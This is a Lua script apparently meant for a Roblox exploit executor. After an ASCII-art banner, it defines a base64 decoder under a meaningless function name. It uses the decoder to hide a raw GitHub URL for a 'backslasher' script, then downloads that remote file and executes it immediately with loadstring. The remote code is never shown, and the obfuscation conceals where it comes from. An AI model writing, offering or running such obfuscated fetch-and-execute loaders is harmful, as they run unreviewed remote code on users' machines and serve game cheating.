--[[
  %8888                                          88888                          8888%                                  ,8888#                                                                           
  %888%                                          8888#                          8888#                                   8888/                                                                           
  #888#                                          %888(                          %888(                                   8888*                                                                           
  #888# /888#*         ,%888(,          ,888(    %888(   *88*        ,#888/     %888(        (888%*          ,%88%*     8888* /888%*          *%8/     ,%8/  ,8%,                 ,%88(        ,%88(    
  (888%#8888888/    (8##88888888     %88888888*  %888( /888888(   %88%888888,   %888/    ,88(%8888888,   ,888%888888    8888%88888888     (88888888, *888888888888/            %88888888*   #88888888*  
  (888(    8888(  ,8888,   (888%    %888*  (*    %888(   %88     *888#    ,     %888/   %888#   ,8888    (888/   ,      8888*    8888,   %888/ %8888/  ,8888  #88,            8888/  (*    %888/  (*    
  (888(    %888#    8888(  #888#    8888,        %888(*888#,     /8888  ,%8#    %888/    /8888  ,8888    (888%  *88/    8888*    8888,   8888*  /88%   *8888                  8888*        8888*        
  #888(    #888#    *%8#   %888(    8888*        %888#/#888888   ,888#*#8888/   %888/    ,(88*  ,8888    *88%(*%8888*   8888*    %888,   8888888(      *8888                  8888/        8888/        
  #888(    #888#  %8888    %888#    %888/        %888#   /888#          #888%   %888/  *8888/   ,8888           8888%   8888*    8888,   %888/         *8888                  8888/        %888(        
  %888#    #888(  ,8888%  (88888    %8888*       %888#   #888#   *888*   8888   8888(   %8888, ,88888,   (888,  ,888%   8888/    8888,   #8888*        /8888*        8888(    88888/       %8888/       
  88888888%%88*    /888888,(888888, (888888888/  8888%   #88888/*8888888888%    888888%  888888(,888888#(8888888888(    8888/    8888    (8888888888,  (8888888%    *888888   (888888888/  (888888888(  
    ,(%888/         *%*     ,%#         *#%*     %(,      (%*       *%%/         ,%#      %(      (%*       /%%*        %(      *8888         /%#,        *%(         ,%,         *#%*         ,#%*
]]--
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
function qGfvLqCdASFVEReDTwTXlArRaVURTMswjULPRHDpLksNWIOPLUseFbnNVteUVOZiFgsHTmGkXue(data) m=string.sub(data, 0, 55) data=data:gsub(m,'')

data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end


 


setfpscap(100000)
loadstring(game:HttpGet(qGfvLqCdASFVEReDTwTXlArRaVURTMswjULPRHDpLksNWIOPLUseFbnNVteUVOZiFgsHTmGkXue('DZvrdxsPsbsqiHoQFLbsTSkPkfCajxlNdZHIntUqQmwRQbUqTIBMHyFaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25lcm9zY3JpcHR6L2JhY2tzbGFzaGVyL21haW4vYmFja3NsYXNoZXJiZXRhd2hpdGVsaXN0Lmx1YQ=='), true))()    
